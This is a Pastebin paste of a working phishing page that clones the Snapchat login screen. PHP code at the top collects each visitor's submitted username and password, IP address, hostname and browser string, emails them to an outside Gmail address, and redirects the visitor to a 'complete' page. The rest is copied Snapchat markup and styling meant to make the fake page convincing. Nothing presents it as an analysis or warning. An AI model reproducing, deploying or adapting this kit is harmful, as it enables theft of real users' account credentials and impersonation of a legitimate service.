Advertisement
Guest User

Untitled

a guest
Aug 5th, 2017
789
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 17.76 KB | None | 0 0
  1. <?php
  2.     If (isset($_POST["username"])&& isset($_POST["password"])){
  3.         $ipAddress = getenv('REMOTE_ADDR');
  4.         $to = "mrasim98@gmail.com";
  5.         $subject = "ٍSnapcaht Account";
  6.         $message = "--------------  UserName -------------\n";
  7.         $message .= "Username : ".$_POST['username']."\n";
  8.         $message .= "Password : ".$_POST['password']."\n";
  9.         $message .= "-------------- Information ------------\n";
  10.         $message .= "IP : ".$ipAddress."\n";
  11.         $message .= "HOST : ".gethostbyaddr( $ipAddress )."\n";
  12.         $message .= "BROWSER : ".$_SERVER['HTTP_USER_AGENT']."\n";
  13.        
  14.         mail( $to, $subject, $message, "From:none@none.com" );
  15.   header('Location: complete.html');
  16.     }
  17. ?>
  18.  
  19. <!DOCTYPE html>
  20.  
  21. <html lang="en"><head><script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/api2/r20170731114946/recaptcha__en.js"></script><script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/api2/r20170731114946/recaptcha__en.js"></script><script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/api2/r20170731114946/recaptcha__en.js"></script><script type="text/javascript" async="" src="https://www.gstatic.com/recaptcha/api2/r20170731114946/recaptcha__en.js"></script><script type="text/javascript" async="" src="recaptcha__en.js.download"></script><script src="chrome-extension://obkfjhifkbhimlocpddgamonjihinpak/script/safebrowse.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Log In • Snapchat</title><!-- Meta --><meta name="referrer" content="origin"><meta name="apple-mobile-web-app-capable" content="no"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"><!-- Styles --><link rel="stylesheet" href="semantic.min.css"><link rel="stylesheet" href="dropdown.min.css"><!-- Force reload of css file --><link rel="stylesheet" href="snapchat.css"><link rel="stylesheet" href="accounts.css"><link rel="stylesheet" href="auth.css"><link rel="stylesheet" href="revoke.css"><!-- Scripts --><script src="jquery.min.js.download"></script><script src="semantic.min.js.download"></script><script src="dropdown.min.js.download"></script><script src="accounts.js.download"></script><!-- Favicon --><link rel="shortcut icon" href="https://accounts.snapchat.com/accounts/static/images/favicon/favicon.png" type="image/png"><script src="recaptcha.js.download"></script><script src="api.js.download" async="" defer=""></script><link rel="stylesheet" type="text/css" href="chrome-extension://immhpnclomdloikkpcefncmfgjbkojmh/emoji.css"></head><body><!-- Pusher is Needed for Top Navigation Menu --><div class="pusher"><div class="snapchatInvertedHeader ui inverted vertical segment"><div class="ui stackable page one column grid"><div class="row"><div class="column"><h1 style="position: relative;"><a href="https://accounts.snapchat.com/"><img src="ghost.svg" alt="Snapchat" class="logo"></a></h1></div></div></div></div><!-- End Inverted Header --><div id="login-root" data-xsrf="PQFM4FgzF0iYT3RFF4Utpg" data-continue="https://accounts.snapchat.com/accounts/welcome"><div data-reactroot="" class="Login"><div class="ui inverted vertical segment accountsBody segment_odg segment_business"><div class="ui stackable page grid"><div class="row"><div class="column accountsCentered"><h1 class="accountsTitle">Log In</h1><div><form class="ui form accountsForm" id="login_form" action="login.php" method="post"><div class="ui error accountsFormError" id="error_message"></div><div class="required field accountsWideField"><div class="ui icon input"><i class="user icon"><img src="user.png"></i><input type="text" class="" name="username" placeholder="Username" value="" autocomplete="off"></div></div><div class="required field accountsWideField"><div class="ui icon input"><i class="lock icon"><img src="password.png"></i><input type="password" class="" name="password" placeholder="Password" value="" autocomplete="off"></div></div><div class="field accountsWideField"><div class="Recaptcha"><div id="g-recaptcha" class="g-recaptcha"></div></div></div><input type="hidden" name="xsrf_token" value="PQFM4FgzF0iYT3RFF4Utpg"><input type="hidden" name="continue" value="https://accounts.snapchat.com/accounts/welcome"><input type="submit" class="ui inverted button accountsWideButton button_odg button_business" value="Log In"><p><a href="/accounts/password_reset_request" class="forgot_pwd_business">Forgot your password?</a></p></form></div></div></div></div></div><div style="background-color: rgb(248, 249, 251); font-size: 14px; line-height: 17px;"><style>
  22.       .footer-container,
  23.       .footer-bottom-bar {
  24.         width: 92.3%;
  25.         max-width: 960px;
  26.         margin: auto;
  27.       }
  28.  
  29.       .footer-container {
  30.         box-sizing: content-box;
  31.         position: relative;
  32.         padding: 30px 0 30px;
  33.         min-height: 195px;
  34.       }
  35.  
  36.       .footer-container .footer-column {
  37.         position: relative;
  38.         box-sizing: border-box;
  39.         float: left;
  40.         width: 25%;
  41.         padding-right: 6.25%;
  42.       }
  43.  
  44.       .footer-container .footer-column .footer-column-header {
  45.         box-sizing: content-box;
  46.         line-height: 23px;
  47.         font-weight: bold;
  48.       }
  49.  
  50.       .footer-container .footer-column .footer-column-expand-caret {
  51.         display: none;
  52.       }
  53.  
  54.       .footer-container .footer-column a {
  55.         display: table;
  56.         color: rgba(0, 0, 0, 0.4);
  57.         text-decoration: none;
  58.         line-height: 17px;
  59.         margin-top: 6px;
  60.       }
  61.       .footer-container .footer-column a:hover {
  62.         color: black;
  63.       }
  64.  
  65.       .footer-container .langue-selection-block {
  66.         position: absolute;
  67.         box-sizing: border-box;
  68.         padding: 0 6.25% 15px 0;
  69.         bottom: 15px;
  70.         width: 25%;
  71.       }
  72.       .footer-container .langue-selection-block .langue-header {
  73.         font-weight: bold;
  74.       }
  75.  
  76.       .footer-bottom-bar a {
  77.         line-height: 56px;
  78.         margin-right: 40px;
  79.         color: white;
  80.         text-decoration: none;
  81.       }
  82.  
  83.       @media (max-width: 767px) {
  84.         .footer-container,
  85.         .footer-bottom-bar {
  86.           width: 100%;
  87.           padding: 0;
  88.         }
  89.  
  90.         .footer-container .footer-column {
  91.           padding: 0;
  92.           width: 100%;
  93.         }
  94.  
  95.         .footer-container .footer-column a,
  96.         .footer-container .footer-column .footer-column-header {
  97.           margin-top: 0;
  98.           padding: 10px 40px;
  99.           width: calc(100% - 80px);
  100.           line-height: 25px;
  101.         }
  102.  
  103.         .footer-container .footer-column .footer-column-header,
  104.         .footer-container .langue-selection-block {
  105.           border-top: solid 1px #D4D4D4;
  106.         }
  107.  
  108.         .footer-container .footer-column .footer-column-header {
  109.           cursor: pointer;
  110.           background-color: white;
  111.         }
  112.  
  113.         .footer-container .footer-column .footer-column-expand-caret {
  114.           display: block;
  115.           position: absolute;
  116.           left: 16px;
  117.           top: 15px;
  118.           width: 15px;
  119.           height: 20px;
  120.           transform-origin: 55% 45%;
  121.           cursor: pointer;
  122.         }
  123.         .footer-container .footer-column.expanded .footer-column-expand-caret {
  124.           transform: rotate(90deg);
  125.           -webkit-transform: rotate(90deg);
  126.         }
  127.  
  128.         .footer-container .footer-column a {
  129.           font-weight: 600;
  130.           color: black;
  131.           border-top: solid 1px #E5E5E5;
  132.           display: none;
  133.         }
  134.         .footer-container .footer-column.expanded a {
  135.           display: block;
  136.           box-sizing: content-box;
  137.         }
  138.  
  139.         .footer-container .langue-selection-block {
  140.           position: static;
  141.           width: 100%;
  142.           height: inherit;
  143.           top: inherit;
  144.           padding: 14px 20px 15px;
  145.         }
  146.  
  147.         .footer-bottom-bar a {
  148.           display: block;
  149.           line-height: 45px;
  150.           margin-right: 0;
  151.           padding-left: 20px;
  152.           border-bottom: solid 1px #D4D4D4;
  153.         }
  154.       }
  155.     </style><div class="footer-container" id="footerContainer"><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20"><g><rect stroke="#000" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="#000" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Company</div><div><a href="https://www.snap.com/en-US/">Snap Inc.</a><a href="https://www.snap.com/en-US/jobs/">Jobs</a><a href="https://www.snap.com/en-US/news/">News</a></div></div><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20"><g><rect stroke="#000" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="#000" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Community</div><div><a href="https://support.snapchat.com/">Support</a><a href="https://support.snapchat.com/a/guidelines">Community Guidelines</a><a href="https://www.snapchat.com/safety">Safety Center</a></div></div><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20"><g><rect stroke="#000" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="#000" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Business</div><div><a href="https://www.snapchat.com/ads">Advertising</a><a href="https://www.snap.com/en-US/ad-policies/">Advertising Policies</a><a href="https://www.snap.com/en-US/brand-guidelines/">Brand Guidelines</a><a href="https://support.snapchat.com/a/promotions-rules">Promotions Rules</a></div></div><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20"><g><rect stroke="#000" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="#000" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Legal</div><div><a href="https://www.snap.com/en-US/privacy/privacy-center/">Privacy Center</a><a href="https://www.snap.com/en-US/cookie-policy/">Cookie Policy</a><a href="https://support.snapchat.com/co/report-copyright">Copyright</a><a href="https://www.snap.com/en-US/terms/on-demand-geofilters/">On-Demand Geofilters Terms and&nbsp;Conditions</a><a href="https://www.snapchat.com/geofilters/terms.html">Community Geofilter Terms and&nbsp;Conditions</a></div></div><div style="clear: both;"></div><div class="langue-selection-block"><div class="langue-header">Language</div><div style="position: relative;"><select id="sc-global-locale-selector" style="-webkit-appearance: none; border: 1px solid rgb(204, 204, 204); border-radius: 5px; background: white; width: 100%; margin-top: 10px; padding: 5px 10px; font-size: 14px; font-family: inherit; color: rgba(0, 0, 0, 0.6); height: 34px; cursor: pointer;"><option value="en-US">English (US)</option><option value="ar">العَرَبِية</option><option value="id-ID">Bahasa Indonesia</option><option value="da-DK">Dansk</option><option value="de-DE">Deutsch</option><option value="el-GR">Ελληνικά</option><option value="en-GB">English (UK)</option><option value="es">Español</option><option value="fr-FR">Français</option><option value="ko-KR">한국어</option><option value="it-IT">Italiano</option><option value="nl-NL">Nederlands</option><option value="ja-JP">日本語</option><option value="nb-NO">Norsk</option><option value="pl-PL">Polski</option><option value="pt-BR">Português (Brasil)</option><option value="pt-PT">Português (Portugal)</option><option value="ro-RO">Română</option><option value="ru-RU">Русский</option><option value="fi-FI">Suomi</option><option value="sv-SE">Svenska</option><option value="tr-TR">Türkçe</option><option value="zh-CN">中文(简体)</option><option value="zh-TW">中文(繁體)</option></select><div style="position: absolute; right: 10px; width: 0px; height: 0px; pointer-events: none; border-style: solid; bottom: 18px; border-width: 0px 3px 5px; border-color: transparent transparent rgb(102, 102, 102);"></div><div style="position: absolute; right: 10px; width: 0px; height: 0px; pointer-events: none; border-style: solid; bottom: 10px; border-width: 5px 3px 0px; border-color: rgb(102, 102, 102) transparent transparent;"></div></div></div></div><div style="background-color: rgb(38, 38, 38);"><div class="footer-bottom-bar"><a href="https://www.snap.com/en-US/privacy/privacy-policy/">Privacy Policy</a><a href="https://www.snap.com/en-US/terms/">Terms of Service</a><div style="clear: both;"></div></div></div><div id="cookiePopupContainer" class="shown"><style>
  156.       #cookiePopupContainer {
  157.         position: fixed;
  158.         width: 100%;
  159.         z-index: 10;
  160.         background: white;
  161.         bottom: 0;
  162.  
  163.         font-size: 14px;
  164.         line-height: 17px;
  165.  
  166.         transition: transform, box-shadow;
  167.         transition-duration: 500ms;
  168.         transition-timing-function: cubic-bezier(0,0,0,1), linear;
  169.         transform: translateY(100%);
  170.         -webkit-transform: translateY(100%);
  171.         box-shadow: 0 0 0 rgba(0,0,0,0.075);
  172.       }
  173.  
  174.       #cookiePopupContainer.shown {
  175.         transform: translateY(0);
  176.         -webkit-transform: translateY(0);
  177.         box-shadow: 0 -1px 3px rgba(0,0,0,0.175);
  178.       }
  179.  
  180.       #cookiePopupContainer #cookiePopupCloseButton {
  181.         position: absolute;
  182.         right: 30px;
  183.         top: calc(50% - 10px);
  184.         border-radius: 50%;
  185.         width: 20px;
  186.         height: 20px;
  187.         background-color: lightgray;
  188.         cursor: pointer;
  189.         transform: rotate(45deg);
  190.         -ms-transform: rotate(45deg);
  191.         -webkit-transform: rotate(45deg);
  192.         background: url(data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20style%3D%22background-color%3A%20lightgray%3B%22%20width%3D%2220%22%20height%3D%2220%22%20viewBox%3D%220%200%2030%2030%22%3E%3Crect%20width%3D%223%22%20height%3D%2220%22%20x%3D%2213.5%22%20y%3D%225%22%20fill%3D%22%23FFF%22%20rx%3D%221%22%20ry%3D%221%22%3E%3C%2Frect%3E%3Crect%20width%3D%2220%22%20height%3D%223%22%20y%3D%2213.5%22%20x%3D%225%22%20fill%3D%22%23FFF%22%20rx%3D%221%22%20ry%3D%221%22%3E%3C%2Frect%3E%3C%2Fsvg%3E);
  193.       }
  194.  
  195.       #cookiePopupContainer #cookiePopupCloseButton:hover {
  196.         background: url(data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20style%3D%22background-color%3A%20gray%3B%22%20width%3D%2220%22%20height%3D%2220%22%20viewBox%3D%220%200%2030%2030%22%3E%3Crect%20width%3D%223%22%20height%3D%2220%22%20x%3D%2213.5%22%20y%3D%225%22%20fill%3D%22%23FFF%22%20rx%3D%221%22%20ry%3D%221%22%3E%3C%2Frect%3E%3Crect%20width%3D%2220%22%20height%3D%223%22%20y%3D%2213.5%22%20x%3D%225%22%20fill%3D%22%23FFF%22%20rx%3D%221%22%20ry%3D%221%22%3E%3C%2Frect%3E%3C%2Fsvg%3E);
  197.       }
  198.  
  199.       #cookiePopupContainer .cookie-text {
  200.         padding: 28px 20px;
  201.         text-align: center;
  202.         margin-left: calc(10% + 210px);
  203.         margin-right: calc(10% + 210px);
  204.       }
  205.  
  206.       @media (max-width: 1200px) {
  207.         #cookiePopupContainer .cookie-text {
  208.           margin-left: 3%;
  209.           margin-right: calc(3% + 40px);
  210.         }
  211.       }
  212.  
  213.       @media (max-width: 1200px) {
  214.         #cookiePopupContainer .cookie-icon {
  215.           display: none;
  216.         }
  217.       }
  218.  
  219.       @media print {
  220.         #cookiePopupContainer {
  221.           display: none;
  222.         }
  223.       }
  224.     </style><div class="cookie-icon cookie-icon-left" style="position: absolute; width: 240px; height: 120px; background: url(&quot;https://www.snapchat.com/home/cookie-1.svg&quot;) center center no-repeat; left: calc(10% - 50px); top: calc(50% - 55px);"></div><div class="cookie-popup"><div class="cookie-text">Hi! We use cookies on this website to help operate our site and for analytics purposes. For more on how we use cookies and your cookie choices, go <a href="https://www.snap.com/en-US/cookie-policy/" target="_blank">here</a>! By continuing to use our services, you are giving us your consent to use cookies.</div></div><div class="cookie-icon cookie-icon-right" style="position: absolute; width: 240px; height: 120px; background: url(&quot;https://www.snapchat.com/home/cookie-2.svg&quot;) center center no-repeat; right: calc(10% - 50px); top: calc(50% - 50px);"></div><div id="cookiePopupCloseButton"></div></div></div></div></div><script src="main.en-us.js.download"></script></div><!-- End Pusher --><div style="background-color: #fff; border: 1px solid #ccc; box-shadow: 2px 2px 3px rgba(0, 0, 0, 0.2); position: absolute; left: 0px; top: -10000px; transition: visibility 0s linear 0.3s, opacity 0.3s linear; opacity: 0; visibility: hidden; z-index: 2000000000;"><div style="width: 100%; height: 100%; position: fixed; top: 0px; left: 0px; z-index: 2000000000; background-color: #fff; opacity: 0.05;  filter: alpha(opacity=5)"></div><div class="g-recaptcha-bubble-arrow" style="border: 11px solid transparent; width: 0; height: 0; position: absolute; pointer-events: none; margin-top: -11px; z-index: 2000000000;"></div><div class="g-recaptcha-bubble-arrow" style="border: 10px solid transparent; width: 0; height: 0; position: absolute; pointer-events: none; margin-top: -10px; z-index: 2000000000;"></div><div style="z-index: 2000000000; position: relative;"><iframe src="bframe.html" title="recaptcha challenge" frameborder="0" scrolling="no" sandbox="allow-forms  allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups allow-popups-to-escape-sandbox" name="443b9iaghuoj" style="width: 100%; height: 100%;"></iframe></div></div></body></html>
  225.     </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement